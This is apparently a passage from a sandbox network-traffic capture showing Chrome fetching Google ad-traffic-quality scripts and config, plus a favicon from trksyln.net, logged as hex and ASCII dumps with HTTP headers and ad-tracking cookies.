2024-10-31 18:19:41 UTC	1378	IN	Data Raw: 78 74 3a 46 61 28 61 2e 5f 63 74 78 5f 29 2c 41 3a 61 2e 5f 62 67 76 5f 2c 76 3a 61 2e 5f 62 67 70 5f 2c 47 3a 61 2e 5f 6c 69 5f 2c 46 3a 61 2e 5f 6a 6b 5f 2c 48 3a 47 61 28 61 2e 5f 73 74 5f 29 2c 49 3a 61 2e 5f 72 63 5f 2c 6f 3a 61 2e 5f 64 6c 5f 2c 44 3a 61 2e 5f 67 32 5f 2c 6a 3a 48 61 28 61 2e 5f 61 74 71 67 5f 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4a 61 28 29 7b 76 61 72 20 61 3d 77 69 6e 64 6f 77 3b 69 66 28 61 2e 47 6f 6f 67 6c 65 44 58 35 59 4b 55 53 6b 29 72 65 74 75 72 6e 20 61 2e 47 6f 6f 67 6c 65 44 58 35 59 4b 55 53 6b 5b 30 5d 3b 76 61 72 20 62 3d 6e 65 77 20 72 2e 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 61 2e 47 6f 6f 67 6c 65 44 58 35 59 4b 55 53 6b 3d 5b 62 2c 63 5d 7d 29 3b 72 65 74 75 72 6e 20 62 7d 0a 66 75 6e 63 74 Data Ascii: xt:Fa(a._ctx_),A:a._bgv_,v:a._bgp_,G:a._li_,F:a._jk_,H:Ga(a._st_),I:a._rc_,o:a._dl_,D:a._g2_,j:Ha(a._atqg_)}}function Ja(){var a=window;if(a.GoogleDX5YKUSk)return a.GoogleDX5YKUSk[0];var b=new r.Promise(function(c){a.GoogleDX5YKUSk=[b,c]});return b}funct

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	51197	142.250.185.66	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:42 UTC	401	OUT	GET /getconfig/sodar?sv=200&tid=gda&tv=r20241028&st=env HTTP/1.1 Host: ep1.adtrafficquality.google Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:42 UTC	610	IN	HTTP/1.1 200 OK P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC" Timing-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Origin: * Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="f.txt" Date: Thu, 31 Oct 2024 18:19:42 GMT Server: cafe Cache-Control: private X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-10-31 18:19:42 UTC	768	IN	Data Raw: 34 32 62 31 0d 0a 7b 22 73 6f 64 61 72 5f 71 75 65 72 79 5f 69 64 22 3a 22 50 73 6f 6a 5a 38 47 32 46 66 54 6f 78 5f 41 50 34 4d 53 52 51 51 22 2c 22 69 6e 6a 65 63 74 6f 72 5f 62 61 73 65 6e 61 6d 65 22 3a 22 73 6f 64 61 72 32 22 2c 22 62 67 5f 68 61 73 68 5f 62 61 73 65 6e 61 6d 65 22 3a 22 4c 4b 4e 56 54 43 42 6d 6d 38 4c 4f 4e 4d 41 46 68 34 76 5a 61 54 49 6b 54 4b 76 72 77 39 4e 43 63 47 62 47 4a 42 78 62 6a 45 38 22 2c 22 62 67 5f 62 69 6e 61 72 79 22 3a 22 66 6c 52 44 32 48 31 31 63 30 75 56 66 4d 63 7a 56 71 36 31 4d 49 6d 53 55 78 64 43 6c 31 63 69 61 4f 4d 68 39 74 50 42 53 49 71 68 41 6f 64 77 67 78 61 34 78 54 64 65 6f 76 62 6a 65 5a 66 6e 4d 6c 54 61 6f 48 75 39 4c 76 6f 54 61 2b 73 50 4e 65 6e 71 36 38 33 35 6b 4c 75 55 57 44 55 48 4e 72 71 Data Ascii: 42b1{"sodar_query_id":"PsojZ8G2FfTox_AP4MSRQQ","injector_basename":"sodar2","bg_hash_basename":"LKNVTCBmm8LONMAFh4vZaTIkTKvrw9NCcGbGJBxbjE8","bg_binary":"flRD2H11c0uVfMczVq61MImSUxdCl1ciaOMh9tPBSIqhAodwgxa4xTdeovbjeZfnMlTaoHu9LvoTa+sPNenq6835kLuUWDUHNrq
2024-10-31 18:19:42 UTC	1378	IN	Data Raw: 79 2b 33 6a 30 35 63 50 73 65 78 58 66 68 30 46 65 6e 2f 6c 2f 32 2f 5a 66 70 30 70 75 61 5a 78 6a 79 6f 66 41 77 66 6b 68 38 75 52 43 36 41 65 4c 50 48 32 37 57 6c 72 62 58 53 72 35 79 77 48 4f 78 67 78 4b 32 39 78 4c 45 4b 47 41 49 2f 6f 50 46 53 66 2b 65 6c 42 52 33 67 69 69 56 38 65 34 33 46 79 6d 73 56 44 37 55 65 75 63 61 6d 32 45 35 79 58 6b 4c 72 46 6b 72 4f 4a 51 49 62 37 48 41 37 6f 46 55 52 47 2f 43 4e 59 30 65 55 4e 6c 32 61 6b 4b 4d 68 49 76 75 6d 47 50 4c 64 5a 46 71 43 30 6c 35 35 76 67 34 4b 30 67 50 73 59 4a 45 4c 51 73 36 41 66 35 42 70 75 4a 44 75 36 37 67 73 4c 37 4b 72 6d 31 78 77 42 50 6f 6d 4b 4f 78 67 6a 58 61 44 35 61 2f 7a 73 53 4e 70 39 6a 4b 4c 43 64 32 48 61 37 4c 71 6d 77 52 78 68 46 34 32 6b 65 6b 43 46 58 43 2f 6f 54 43 4b Data Ascii: y+3j05cPsexXfh0Fen/l/2/Zfp0puaZxjyofAwfkh8uRC6AeLPH27WlrbXSr5ywHOxgxK29xLEKGAI/oPFSf+elBR3giiV8e43FymsVD7Ueucam2E5yXkLrFkrOJQIb7HA7oFURG/CNY0eUNl2akKMhIvumGPLdZFqC0l55vg4K0gPsYJELQs6Af5BpuJDu67gsL7Krm1xwBPomKOxgjXaD5a/zsSNp9jKLCd2Ha7LqmwRxhF42kekCFXC/oTCK
2024-10-31 18:19:42 UTC	1378	IN	Data Raw: 6a 72 33 48 30 55 78 33 65 65 6a 2f 76 31 54 79 55 39 6e 48 45 2b 57 49 73 4f 4b 6e 4d 53 36 52 4b 7a 4d 51 7a 43 65 6b 35 6c 44 43 7a 39 4c 4c 62 6c 6e 4d 38 36 4c 4b 6b 67 67 42 2b 36 45 75 35 65 42 37 48 71 33 57 57 41 4c 31 74 56 4b 62 32 6d 4a 32 49 52 62 69 34 4f 56 46 31 75 50 54 6e 32 74 51 6d 36 55 65 4f 70 64 6b 41 75 52 65 57 55 35 74 37 6b 5a 4c 2f 45 31 32 2f 41 36 33 68 46 6b 2b 41 48 73 6e 79 73 34 75 6c 34 4a 2b 34 4e 79 64 41 4c 32 31 49 4f 71 2b 51 78 79 6f 70 4f 4b 6d 30 41 79 35 76 68 52 63 66 30 58 79 45 2b 46 72 75 4d 6d 46 4f 30 63 50 4d 6b 72 4b 5a 6e 38 7a 44 41 6a 4d 78 35 36 32 77 44 50 70 5a 57 79 6c 53 30 72 31 44 55 42 54 6f 70 4d 51 65 30 6d 33 56 44 4b 30 48 67 47 35 33 74 59 38 78 57 50 65 62 34 36 4d 52 75 52 51 36 4b 56 Data Ascii: jr3H0Ux3eej/v1TyU9nHE+WIsOKnMS6RKzMQzCek5lDCz9LLblnM86LKkggB+6Eu5eB7Hq3WWAL1tVKb2mJ2IRbi4OVF1uPTn2tQm6UeOpdkAuReWU5t7kZL/E12/A63hFk+AHsnys4ul4J+4NydAL21IOq+QxyopOKm0Ay5vhRcf0XyE+FruMmFO0cPMkrKZn8zDAjMx562wDPpZWylS0r1DUBTopMQe0m3VDK0HgG53tY8xWPeb46MRuRQ6KV
2024-10-31 18:19:42 UTC	1378	IN	Data Raw: 30 38 5a 32 66 69 36 6f 33 39 6d 70 4e 73 4e 41 48 59 6e 73 79 36 50 66 50 68 4c 33 36 57 70 4e 6d 33 79 76 45 6b 6a 77 32 42 32 6d 52 7a 78 64 72 7a 35 77 48 4a 55 48 4b 68 53 4e 75 78 70 30 37 42 30 4a 4e 4e 69 72 52 31 72 57 67 62 36 78 67 56 5a 54 67 70 71 38 51 51 49 44 30 58 35 7a 70 65 44 6f 45 37 55 59 38 35 4c 61 51 77 62 68 4f 46 6a 41 50 36 61 38 58 64 39 6d 70 68 69 61 73 4d 35 73 63 49 49 6b 6e 30 74 34 59 79 4d 77 41 72 62 65 77 7a 62 73 67 70 51 41 68 4f 48 4b 66 4b 48 49 50 31 71 42 39 47 43 61 31 4a 74 68 58 51 30 64 33 72 41 79 50 33 74 50 2b 64 32 35 42 61 2b 4e 41 34 4a 35 45 65 4f 77 58 37 5a 55 47 34 63 44 46 73 75 37 68 38 77 45 54 4b 68 6e 49 58 62 58 70 37 57 31 72 79 78 47 4e 30 46 62 44 55 68 70 2b 50 34 6f 77 53 34 74 52 4f 69 Data Ascii: 08Z2fi6o39mpNsNAHYnsy6PfPhL36WpNm3yvEkjw2B2mRzxdrz5wHJUHKhSNuxp07B0JNNirR1rWgb6xgVZTgpq8QQID0X5zpeDoE7UY85LaQwbhOFjAP6a8Xd9mphiasM5scIIkn0t4YyMwArbewzbsgpQAhOHKfKHIP1qB9GCa1JthXQ0d3rAyP3tP+d25Ba+NA4J5EeOwX7ZUG4cDFsu7h8wETKhnIXbXp7W1ryxGN0FbDUhp+P4owS4tROi
2024-10-31 18:19:42 UTC	1378	IN	Data Raw: 37 41 72 51 70 57 33 36 48 6d 70 4d 77 34 50 68 56 72 77 4d 77 66 62 37 56 7a 38 36 4b 63 4d 66 43 63 71 51 59 67 62 6c 6a 34 34 32 55 4b 38 79 7a 30 4c 78 35 51 51 6d 74 55 6b 70 6d 36 53 32 71 6f 31 51 34 6d 35 46 6b 6e 72 72 55 79 57 6c 56 31 49 63 62 6f 78 58 4e 33 55 32 4a 44 51 55 78 55 4e 43 46 47 44 4e 6d 56 2b 61 56 76 39 31 64 4f 41 4b 56 6a 62 47 4a 74 66 76 54 4a 47 5a 48 67 77 34 77 32 31 6e 45 2f 55 34 7a 46 56 32 36 36 46 51 4d 4a 76 6f 65 38 58 57 6c 58 41 51 64 74 33 44 48 67 6e 69 45 79 55 6e 56 44 46 6b 56 68 44 2f 6d 66 33 41 68 4d 6a 48 38 36 32 55 35 35 4e 66 58 45 59 38 73 35 50 49 58 74 44 35 6e 62 48 5a 38 42 7a 46 6e 46 6f 48 50 66 4a 65 61 72 79 59 32 4b 67 2b 36 2b 31 31 38 74 33 39 30 79 4b 46 58 31 61 77 34 4d 74 6b 73 31 2f Data Ascii: 7ArQpW36HmpMw4PhVrwMwfb7Vz86KcMfCcqQYgblj442UK8yz0Lx5QQmtUkpm6S2qo1Q4m5FknrrUyWlV1IcboxXN3U2JDQUxUNCFGDNmV+aVv91dOAKVjbGJtfvTJGZHgw4w21nE/U4zFV266FQMJvoe8XWlXAQdt3DHgniEyUnVDFkVhD/mf3AhMjH862U55NfXEY8s5PIXtD5nbHZ8BzFnFoHPfJearyY2Kg+6+118t390yKFX1aw4Mtks1/
2024-10-31 18:19:42 UTC	1378	IN	Data Raw: 78 38 67 4e 46 64 64 4b 4d 57 78 36 7a 73 54 4e 45 44 63 77 65 54 66 72 32 42 63 6d 6d 51 4e 46 42 4f 73 70 7a 56 42 59 51 36 49 58 73 37 69 6c 50 66 68 70 46 32 79 6a 4f 51 31 4c 2f 35 7a 68 2b 6f 79 73 4a 75 75 59 2b 62 36 63 62 35 68 78 31 38 2f 4b 4d 30 43 62 50 4e 4f 57 34 30 4b 69 7a 50 4a 4f 79 44 4e 38 68 64 46 42 39 61 5a 6c 41 68 63 65 36 65 42 70 6d 53 58 4d 53 44 6c 73 4c 6b 68 33 4f 2f 32 70 57 76 70 52 72 62 44 4e 66 53 66 53 4d 68 6c 78 38 72 44 74 52 48 52 35 62 64 6c 6d 4c 4b 35 76 70 30 47 4e 33 30 76 6a 47 2f 75 45 4c 66 59 69 4d 6b 6f 52 7a 77 62 78 5a 70 31 79 6d 78 30 46 50 36 31 44 30 69 65 36 66 59 5a 31 62 77 35 6d 32 51 56 6c 6d 56 68 65 47 68 62 59 77 59 6b 33 36 41 61 66 59 79 6e 52 73 43 70 63 34 6d 4f 6c 39 4f 6b 30 47 5a 6d Data Ascii: x8gNFddKMWx6zsTNEDcweTfr2BcmmQNFBOspzVBYQ6IXs7ilPfhpF2yjOQ1L/5zh+oysJuuY+b6cb5hx18/KM0CbPNOW40KizPJOyDN8hdFB9aZlAhce6eBpmSXMSDlsLkh3O/2pWvpRrbDNfSfSMhlx8rDtRHR5bdlmLK5vp0GN30vjG/uELfYiMkoRzwbxZp1ymx0FP61D0ie6fYZ1bw5m2QVlmVheGhbYwYk36AafYynRsCpc4mOl9Ok0GZm
2024-10-31 18:19:42 UTC	1378	IN	Data Raw: 72 53 4f 52 39 6e 2b 4d 4f 7a 44 72 78 43 2f 4b 4f 6a 67 68 6d 65 33 68 66 66 63 4b 34 42 6c 69 5a 39 64 58 4f 54 4a 47 4e 56 31 6b 79 77 5a 68 49 33 41 6c 33 2b 34 6b 36 72 6c 63 4f 32 66 49 6b 32 52 38 56 6a 39 38 2f 62 70 72 6d 35 41 50 44 36 36 34 68 49 58 46 54 6e 79 2b 73 6f 39 2b 68 71 56 35 37 57 39 47 64 47 72 32 43 30 30 2f 44 31 58 47 69 30 38 52 44 2b 68 4b 4d 4b 59 53 76 31 4c 66 30 66 4e 34 34 6d 30 47 75 59 46 37 7a 5a 2b 48 39 30 36 6f 6f 6d 46 57 49 5a 5a 65 50 6d 6c 62 58 61 64 39 6b 7a 63 63 39 43 6d 6b 64 59 57 31 30 58 31 39 50 38 70 42 43 77 37 6c 75 65 36 52 53 39 4b 66 6c 58 4d 68 72 35 38 6a 39 43 74 68 30 4d 6e 57 4b 44 32 69 72 2b 76 6e 31 45 6e 74 74 76 6e 58 52 5a 79 53 37 5a 47 64 30 76 76 63 49 76 68 2b 4e 4b 76 61 6f 7a 45 Data Ascii: rSOR9n+MOzDrxC/KOjghme3hffcK4BliZ9dXOTJGNV1kywZhI3Al3+4k6rlcO2fIk2R8Vj98/bprm5APD664hIXFTny+so9+hqV57W9GdGr2C00/D1XGi08RD+hKMKYSv1Lf0fN44m0GuYF7zZ+H906oomFWIZZePmlbXad9kzcc9CmkdYW10X19P8pBCw7lue6RS9KflXMhr58j9Cth0MnWKD2ir+vn1EnttvnXRZyS7ZGd0vvcIvh+NKvaozE
2024-10-31 18:19:42 UTC	1378	IN	Data Raw: 6d 58 6d 50 6c 53 57 73 70 69 4b 75 2b 33 61 57 78 41 64 6b 45 5a 39 67 32 78 42 62 65 47 45 74 38 45 61 70 6b 56 62 52 43 59 76 52 49 37 49 31 71 58 4d 64 6c 6e 57 48 2b 7a 72 4b 64 4d 68 41 45 6a 6a 45 6b 2f 5a 65 6f 5a 44 44 35 62 6b 51 61 63 6d 35 59 4c 39 51 51 72 46 54 2b 49 4d 53 53 73 2f 57 50 6e 48 43 77 58 55 37 6b 6f 41 31 75 45 67 50 55 6d 6a 73 36 7a 63 68 46 44 4b 77 70 73 51 59 5a 4a 33 49 53 71 52 52 49 6d 76 53 79 53 2f 71 4d 42 70 2b 59 39 39 55 78 4c 39 52 70 71 52 74 73 66 37 44 4c 61 6d 67 46 75 70 61 78 56 2f 7a 43 42 41 4f 66 4c 70 70 47 35 6c 79 66 39 30 2f 47 5a 48 5a 62 72 68 42 34 30 62 4b 71 78 77 37 70 51 39 2b 47 37 47 4c 71 78 4a 68 54 4e 4f 75 42 34 45 6b 54 52 31 70 76 62 78 63 75 6d 2f 73 4c 41 43 50 44 37 30 35 4e 53 33 Data Ascii: mXmPlSWspiKu+3aWxAdkEZ9g2xBbeGEt8EapkVbRCYvRI7I1qXMdlnWH+zrKdMhAEjjEk/ZeoZDD5bkQacm5YL9QQrFT+IMSSs/WPnHCwXU7koA1uEgPUmjs6zchFDKwpsQYZJ3ISqRRImvSyS/qMBp+Y99UxL9RpqRtsf7DLamgFupaxV/zCBAOfLppG5lyf90/GZHZbrhB40bKqxw7pQ9+G7GLqxJhTNOuB4EkTR1pvbxcum/sLACPD705NS3
2024-10-31 18:19:42 UTC	1378	IN	Data Raw: 34 2f 58 6a 7a 50 2f 6e 6b 46 4a 45 43 65 75 7a 47 47 71 66 63 69 6a 33 4e 49 35 34 34 30 37 4b 73 53 59 48 6e 45 41 32 57 42 6a 58 4f 51 46 41 56 2f 58 66 6a 51 5a 6b 5a 32 39 70 6a 62 34 7a 47 79 46 6c 52 37 5a 2f 63 2b 55 41 54 4b 61 37 2f 52 42 59 6e 6b 75 35 35 47 4a 44 72 62 38 4d 58 49 64 35 4d 51 56 55 42 38 37 75 4c 77 2f 79 7a 2f 75 66 65 2b 37 75 34 6d 4e 48 56 31 54 50 32 76 44 31 4c 32 64 46 61 4e 39 72 53 52 49 6d 66 38 4b 56 2b 31 62 66 6d 64 76 47 74 44 54 5a 2b 53 47 61 4a 4d 72 78 54 36 2b 4f 4f 76 4d 78 62 49 63 71 4c 7a 53 4a 78 52 63 78 67 49 6f 49 4a 4a 44 41 49 6b 4e 6f 56 76 78 75 53 31 43 46 78 34 70 36 64 4a 77 46 47 69 4e 36 6d 31 68 39 58 71 54 47 32 38 4a 70 52 69 63 4e 70 70 76 4b 74 77 55 55 44 79 46 69 46 59 30 44 36 77 4c Data Ascii: 4/XjzP/nkFJECeuzGGqfcij3NI54407KsSYHnEA2WBjXOQFAV/XfjQZkZ29pjb4zGyFlR7Z/c+UATKa7/RBYnku55GJDrb8MXId5MQVUB87uLw/yz/ufe+7u4mNHV1TP2vD1L2dFaN9rSRImf8KV+1bfmdvGtDTZ+SGaJMrxT6+OOvMxbIcqLzSJxRcxgIoIJJDAIkNoVvxuS1CFx4p6dJwFGiN6m1h9XqTG28JpRicNppvKtwUUDyFiFY0D6wL
2024-10-31 18:19:42 UTC	1378	IN	Data Raw: 4d 53 4e 71 35 43 4e 7a 56 36 52 75 76 71 73 64 51 77 31 70 4e 79 37 32 33 6e 73 46 42 67 52 33 7a 38 47 4a 6e 42 6b 6e 5a 33 43 2b 4c 30 37 62 33 56 79 53 75 77 42 72 74 52 73 44 64 72 6c 52 52 7a 42 70 6b 5a 71 67 4a 64 67 64 69 59 70 33 33 59 4f 55 66 77 4d 31 55 30 50 32 4c 79 6b 4a 70 72 42 68 43 42 52 7a 70 4b 2b 42 72 4f 69 54 33 50 58 73 65 48 54 50 43 45 65 4e 6a 33 78 71 56 7a 70 41 49 52 4b 70 6a 44 79 41 31 34 42 2b 2f 31 32 50 64 56 78 6f 49 4d 55 49 42 6f 67 56 73 49 47 69 61 55 76 55 4d 37 62 61 42 4a 79 57 47 71 39 52 32 57 42 77 69 58 4e 71 4b 71 4e 52 46 49 74 56 71 47 59 44 66 68 2f 39 64 36 47 51 34 77 45 49 67 4c 43 4c 59 48 76 4b 36 74 57 6d 6c 70 73 47 34 79 61 49 39 48 64 37 38 6a 68 4f 4e 33 45 53 69 49 4d 6b 63 34 4b 56 39 43 63 Data Ascii: MSNq5CNzV6RuvqsdQw1pNy723nsFBgR3z8GJnBknZ3C+L07b3VySuwBrtRsDdrlRRzBpkZqgJdgdiYp33YOUfwM1U0P2LykJprBhCBRzpK+BrOiT3PXseHTPCEeNj3xqVzpAIRKpjDyA14B+/12PdVxoIMUIBogVsIGiaUvUM7baBJyWGq9R2WBwiXNqKqNRFItVqGYDfh/9d6GQ4wEIgLCLYHvK6tWmlpsG4yaI9Hd78jhON3ESiIMkc4KV9Cc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	51196	160.153.155.187	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:42 UTC	995	OUT	GET /favicon.ico HTTP/1.1 Host: trksyln.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0; __gads=ID=306266a9c2348d29:T=1730398769:RT=1730398769:S=ALNI_Mbbw868vcgtQoLBWAGr_Cg5L1s2aA; __gpi=UID=00000f481e63bcec:T=1730398769:RT=1730398769:S=ALNI_Ma2HfWNKb2HbqWiBFztPiWyAdupEA; __eoi=ID=c1a37bea35cc93c0:T=1730398769:RT=1730398769:S=AA-AfjY72W63xu-aXyCL3e10qgJe; FCNEC=%5B%5B%22AKsRol9oUVcMXiFoqzkj1NEa08EJHnvQLU1QPHYF1L1Ozn0rxWlj1OU96qI8aKh50hz1fmLcU4sYmGwr3wGXMgFDvn_e8490-tvoBSDRIEcmLYrwc8BRbcmqmEeBeHgdMPnNSa3lMVW3T4Tr1qq5ui7eaUI39kjUvQ%3D%3D%22%5D%2Cnull%2C%5B%5B2%2C%22%5Bnull%2C%5Bnull%2C1%2C%5B1730398774%2C265359000%5D%5D%5D%22%5D%5D%5D
2024-10-31 18:19:42 UTC	301	IN	HTTP/1.1 200 OK Content-Type: image/x-icon Last-Modified: Tue, 11 Apr 2023 08:02:00 GMT Accept-Ranges: bytes ETag: "0ccbbe44b6cd91:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Thu, 31 Oct 2024 18:19:42 GMT Connection: close Content-Length: 15406
2024-10-31 18:19:42 UTC	15406	IN	Data Raw: 00 00 01 00 03 00 10 10 00 00 01 00 20 00 68 04 00 00 36 00 00 00 20 20 00 00 01 00 20 00 28 11 00 00 9e 04 00 00 30 30 00 00 01 00 20 00 68 26 00 00 c6 15 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 66 66 05 b8 b8 b8 7e cd cd cd d6 c7 c7 c7 e1 c6 c6 c6 e1 cb cb cb e1 c9 c9 c9 e1 c2 c2 c2 e1 bc bc bc e1 cf cf cf e1 cf cf cf e1 cf cf cf e1 cf cf cf e1 cf cf cf d6 be be be 7e 66 66 66 05 bc bc bc 7a c6 c6 c6 fe be be be ff 9a 9a 9a ff 99 99 99 ff 97 97 97 ff 99 99 99 ff 96 96 96 ff c0 c0 c0 ff ce ce ce ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 fe be be be 7a cf cf cf ce ae ae ae ff a8 a8 a8 ff 9d 9d 9d ff bc bc bc ff 81 81 81 ff a4 a4 a4 ff b8 b8 b8 ff bc Data Ascii: h6 (00 h&( fff~~fffzz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	51218	142.250.186.33	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:42 UTC	713	OUT	GET /sodar/sodar2/232/runner.html HTTP/1.1 Host: ep2.adtrafficquality.google Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:42 UTC	689	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="adspam-signals-scs" Report-To: {"group":"adspam-signals-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/adspam-signals-scs"}]} Content-Length: 13020 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 31 Oct 2024 17:43:27 GMT Expires: Thu, 31 Oct 2024 18:33:27 GMT Cache-Control: public, max-age=3000 Last-Modified: Mon, 23 Sep 2024 18:12:21 GMT Content-Type: text/html Vary: Accept-Encoding Age: 2175 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-31 18:19:42 UTC	689	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 7d 7d 7d 76 61 72 20 70 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d Data Ascii: <!DOCTYPE html><meta charset=utf-8><script>(function(){'use strict';function m(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var p=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==
2024-10-31 18:19:42 UTC	1378	IN	Data Raw: 7b 69 66 28 21 63 7c 7c 61 21 3d 6e 75 6c 6c 29 7b 63 3d 77 5b 62 5d 3b 69 66 28 63 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 5b 62 5d 3b 63 3d 61 5b 63 5d 3b 72 65 74 75 72 6e 20 63 21 3d 3d 76 6f 69 64 20 30 3f 63 3a 61 5b 62 5d 7d 7d 0a 66 75 6e 63 74 69 6f 6e 20 79 28 61 2c 62 2c 63 29 7b 69 66 28 62 29 61 3a 7b 76 61 72 20 65 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 61 3d 65 2e 6c 65 6e 67 74 68 3d 3d 3d 31 3b 76 61 72 20 66 3d 65 5b 30 5d 2c 68 3b 21 61 26 26 66 20 69 6e 20 76 3f 68 3d 76 3a 68 3d 72 3b 66 6f 72 28 66 3d 30 3b 66 3c 65 2e 6c 65 6e 67 74 68 2d 31 3b 66 2b 2b 29 7b 76 61 72 20 64 3d 65 5b 66 5d 3b 69 66 28 21 28 64 20 69 6e 20 68 29 29 62 72 65 61 6b 20 61 3b 68 3d 68 5b 64 5d 7d 65 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3b 63 Data Ascii: {if(!c\|\|a!=null){c=w[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}}function y(a,b,c){if(b)a:{var e=a.split(".");a=e.length===1;var f=e[0],h;!a&&f in v?h=v:h=r;for(f=0;f<e.length-1;f++){var d=e[f];if(!(d in h))break a;h=h[d]}e=e[e.length-1];c
2024-10-31 18:19:42 UTC	1378	IN	Data Raw: 20 63 61 28 61 2c 62 29 7b 61 2e 72 61 77 3d 62 3b 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 26 26 28 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 61 29 2c 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 62 29 29 3b 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 41 28 61 29 7b 76 61 72 20 62 3d 74 79 70 65 6f 66 20 76 2e 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 78 28 76 2e 53 79 6d 62 6f 6c 2c 22 69 74 65 72 61 74 6f 72 22 29 26 26 61 5b 78 28 76 2e 53 79 6d 62 6f 6c 2c 22 69 74 65 72 61 74 6f 72 22 29 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 6d 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 Data Ascii: ca(a,b){a.raw=b;Object.freeze&&(Object.freeze(a),Object.freeze(b));return a}function A(a){var b=typeof v.Symbol!="undefined"&&x(v.Symbol,"iterator")&&a[x(v.Symbol,"iterator")];if(b)return b.call(a);if(typeof a.length=="number")return{next:m(a)};throw Err
